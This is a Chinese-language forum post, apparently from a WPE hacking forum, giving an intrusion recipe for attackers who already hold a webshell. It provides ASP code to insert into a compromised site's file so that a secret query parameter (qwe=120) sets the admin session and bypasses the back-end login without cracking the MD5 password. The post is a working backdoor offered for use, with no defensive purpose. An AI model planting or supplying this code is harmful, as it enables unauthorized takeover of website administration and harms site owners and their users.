WPE|52wpe|我爱WPE

 找回密码
 注册会员
搜索
  • 2101查看
  • 0回复

主题

好友

166

积分

注册会员

发表于 2009-12-10 15:39:21 |显示全部楼层
这个办法在拿到webshell却想进后台的时候很实用,收藏一下。


首先,我们要上传一个木马,通过下载数据库或者其他方法得到管理员的用户名。然后找到一个ASP文件,在其中的<%…………%>之间加上

dim id
id=trim(request("qwe"))
if id="120" then
session("AdminName")="管理员用户名"
end if

然后访问的时候在这个ASP文件后面加上?qwe=120

然后进入后台页面,是不是直接进去了?不用你输入用户名和口令了吧…………这里我们就少了一步(破解MD5密码) 利用WEBSHELL直接进入后台

快速发帖

您需要登录后才可以回帖 登录 | 注册会员

手机版|Archiver|WPE|52wpe|我爱WPE ( 闽ICP备15009081号 )

GMT+8, 2024-5-3 08:05 , Processed in 0.062984 second(s), 16 queries .

返回顶部